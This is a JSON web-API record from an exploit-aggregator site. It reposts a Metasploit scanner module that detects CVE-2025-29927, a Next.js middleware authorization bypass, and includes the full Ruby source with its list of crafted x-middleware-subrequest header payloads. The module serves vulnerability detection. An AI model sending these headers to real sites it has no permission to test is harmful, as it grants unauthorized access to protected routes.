{"id":65509,"date":"2026-06-24T15:49:33","date_gmt":"2026-06-24T15:49:33","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=65509"},"modified":"2026-06-24T15:49:33","modified_gmt":"2026-06-24T15:49:33","slug":"nextjs-middleware-authorization-bypass-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=65509","title":{"rendered":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-"},"content":{"rendered":"

{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects self-hosted Next.js applications affected by CVE-2025-29927, an authorization bypass in the middleware layer. Next.js tags its own internal subrequests with the x-middleware-subrequest header and skips middleware when it sees it…”,”published”:”2026-06-24T19:04:51″,”modified”:”2026-06-24T19:04:51″,”type”:”metasploit”,”title”:”Next.js Middleware Authorization Bypass Scanner”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-29927″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n\\n # HTTP status codes that indicate the request was gated (blocked or redirected)\\n # by middleware rather than served.\\n GATE_CODES = [301, 302, 303, 307, 308, 401, 403].freeze\\n\\n # x-middleware-subrequest values to try, covering Next.js 12.2 through 15.x.\\n # Next.js \\u003e= ~13.2 only skips middleware once the middleware module name appears\\n # five times (MAX_RECURSION_DEPTH); earlier lines accept a single occurrence, and\\n # the \\”src\/\\” variants apply when middleware lives under a src\/ directory.\\n PAYLOADS = [\\n ‘middleware:middleware:middleware:middleware:middleware’,\\n ‘src\/middleware:src\/middleware:src\/middleware:src\/middleware:src\/middleware’,\\n ‘middleware’,\\n ‘src\/middleware’,\\n ‘pages\/_middleware’\\n ].freeze\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Next.js Middleware Authorization Bypass Scanner’,\\n ‘Description’ =\\u003e %q{\\n This module detects self-hosted Next.js applications affected by\\n CVE-2025-29927, an authorization bypass in the middleware layer. Next.js\\n tags its own internal subrequests with the x-middleware-subrequest header\\n and skips middleware when it sees it. The header is trusted without\\n verifying it originated internally, so an external client that supplies it\\n causes middleware to be skipped entirely, bypassing any authentication,\\n authorization, or redirects implemented there. Affected self-hosted\\n versions are \\u003c 12.3.5, \\u003c 13.5.9, \\u003c 14.2.25, and \\u003c 15.2.3.\\n\\n The module performs a differential check: it sends a baseline request to a\\n user-supplied, normally middleware-gated path (expecting a redirect or a\\n 401\/403), then repeats the request with a crafted x-middleware-subrequest\\n header. If the gate disappears (the protected resource is served, or the\\n middleware redirect to login is gone), the target is reported vulnerable.\\n This is detection only; the module does not act on the bypassed response.\\n },\\n ‘Author’ =\\u003e [\\n ‘Rachid Allam’, # vulnerability discovery (zhero)\\n ‘Yasser Allam’, # vulnerability discovery (inzo)\\n ‘Kenneth LaCroix’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-29927’],\\n [‘GHSA’, ‘f82v-jwr5-mffw’],\\n [‘URL’, ‘https:\/\/projectdiscovery.io\/blog\/nextjs-middleware-authorization-bypass’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-03-21’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n },\\n ‘DefaultOptions’ =\\u003e { ‘RPORT’ =\\u003e 3000, ‘SSL’ =\\u003e false }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘A path normally gated by Next.js middleware (e.g. an authenticated route that redirects to login)’, ‘\/dashboard’]),\\n OptString.new(‘SUBREQUEST_PAYLOAD’, [false, ‘Force a single x-middleware-subrequest value instead of trying the built-in list’, ”])\\n ]\\n )\\n end\\n\\n def payloads\\n forced = datastore[‘SUBREQUEST_PAYLOAD’].to_s\\n forced.empty? ? PAYLOADS : [forced]\\n end\\n\\n # Best-effort Next.js fingerprint, used for reporting only (the differential is the\\n # authoritative signal; the header may be stripped by a proxy).\\n def nextjs?(res)\\n return false unless res\\n return true if res.headers[‘X-Powered-By’].to_s.include?(‘Next.js’)\\n return true if res.headers.keys.any? { |k| k.downcase.start_with?(‘x-nextjs-‘) }\\n\\n res.body.to_s.include?(‘\/_next\/static\/’)\\n end\\n\\n def describe_response(res)\\n loc = res.headers[‘location’].to_s\\n loc.empty? ? \\”HTTP #{res.code}\\” : \\”HTTP #{res.code} -\\u003e #{loc}\\”\\n end\\n\\n def baseline_request\\n send_request_cgi(‘method’ =\\u003e ‘GET’, ‘uri’ =\\u003e normalize_uri(target_uri.path))\\n end\\n\\n # Returns { payload:, response: } for the first payload that defeats the gate,\\n # or nil. Relative to the gated baseline, a bypass is detected when the middleware\\n # gate no longer applies: either the response is no longer a gate status (e.g. the\\n # protected page is served with 200), or it is still a redirect but to a different\\n # target (the middleware login redirect is gone, e.g. trailing-slash normalization\\n # to the real route). Comparing the Location avoids missing a same-status bypass.\\n def bypassing_payload(baseline)\\n base_loc = baseline.headers[‘location’].to_s\\n payloads.each do |payload|\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘headers’ =\\u003e { ‘x-middleware-subrequest’ =\\u003e payload }\\n )\\n next unless res\\n next if res.code \\u003e= 500\\n\\n gate_gone = !GATE_CODES.include?(res.code) \\u0026\\u0026 res.code != baseline.code\\n redirect_changed = GATE_CODES.include?(res.code) \\u0026\\u0026\\n (res.code != baseline.code || res.headers[‘location’].to_s != base_loc)\\n return { payload: payload, response: res } if gate_gone || redirect_changed\\n end\\n nil\\n end\\n\\n def check_host(_ip)\\n baseline = baseline_request\\n return Exploit::CheckCode::Unknown(‘No response to the baseline request’) unless baseline\\n unless GATE_CODES.include?(baseline.code)\\n return Exploit::CheckCode::Detected(\\”#{target_uri.path} is not middleware-gated (#{describe_response(baseline)}); set TARGETURI to a protected path\\”)\\n end\\n\\n hit = bypassing_payload(baseline)\\n return Exploit::CheckCode::Safe(\\”#{target_uri.path} gated (#{describe_response(baseline)}); not bypassed\\”) if hit.nil?\\n\\n Exploit::CheckCode::Vulnerable(\\”Middleware bypassed: #{describe_response(baseline)} -\\u003e #{describe_response(hit[:response])} with ‘#{hit[:payload]}’\\”)\\n end\\n\\n def run_host(_ip)\\n baseline = baseline_request\\n if baseline.nil?\\n print_error(\\”#{peer} – No response to the baseline request on #{target_uri.path}\\”)\\n return\\n end\\n unless GATE_CODES.include?(baseline.code)\\n vprint_status(\\”#{peer} – #{target_uri.path} is not middleware-gated (#{describe_response(baseline)}); set TARGETURI to a protected path\\”)\\n return\\n end\\n vprint_status(\\”#{peer} – Baseline #{describe_response(baseline)} on #{target_uri.path}#{nextjs?(baseline) ? ‘ (Next.js detected)’ : ”}\\”)\\n\\n hit = bypassing_payload(baseline)\\n if hit.nil?\\n print_status(\\”#{peer} – #{target_uri.path} gated (#{describe_response(baseline)}); not bypassed (patched or not Next.js middleware)\\”)\\n return\\n end\\n\\n print_good(\\”#{peer} – Next.js middleware authorization bypass confirmed (CVE-2025-29927): #{describe_response(baseline)} -\\u003e #{describe_response(hit[:response])} with x-middleware-subrequest ‘#{hit[:payload]}’\\”)\\n report_vuln(\\n host: rhost,\\n port: rport,\\n name: name,\\n info: \\”x-middleware-subrequest bypass on #{target_uri.path}; #{describe_response(baseline)} -\\u003e #{describe_response(hit[:response])}\\”,\\n refs: references\\n )\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/http\/nextjs_middleware_auth_bypass.rb”,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/nextjs_middleware_auth_bypass\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects self-hosted Next.js applications affected by CVE-2025-29927, an authorization bypass in the middleware layer. Next.js tags its own internal subrequests with the x-middleware-subrequest…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,169,13,7,11,5],"class_list":["post-65509","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nNext.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=65509\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects self-hosted Next.js applications affected by CVE-2025-29927, an authorization bypass in the middleware layer. Next.js tags its own internal subrequests with the x-middleware-subrequest...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=65509\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-24T15:49:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-\",\"datePublished\":\"2026-06-24T15:49:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509\"},\"wordCount\":1272,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=65509#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509\",\"name\":\"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-24T15:49:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=65509\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=65509#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=65509","og_locale":"en_US","og_type":"article","og_title":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem","og_description":"{“lastseen”:”2026-06-24T19:36:58″,”description”:”This module detects self-hosted Next.js applications affected by CVE-2025-29927, an authorization bypass in the middleware layer. Next.js tags its own internal subrequests with the x-middleware-subrequest...","og_url":"https:\/\/zero.redgem.net\/?p=65509","og_site_name":"zero redgem","article_published_time":"2026-06-24T15:49:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=65509#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=65509"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-","datePublished":"2026-06-24T15:49:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=65509"},"wordCount":1272,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=65509#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=65509","url":"https:\/\/zero.redgem.net\/?p=65509","name":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-24T15:49:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=65509#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=65509"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=65509#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Next.js Middleware Authorization Bypass Scanner_MSF:AUXILIARY-SCANNER-HTTP-NEXTJS_MIDDLEWARE_AUTH_BYPASS-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/65509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65509"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/65509\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=65509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=65509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}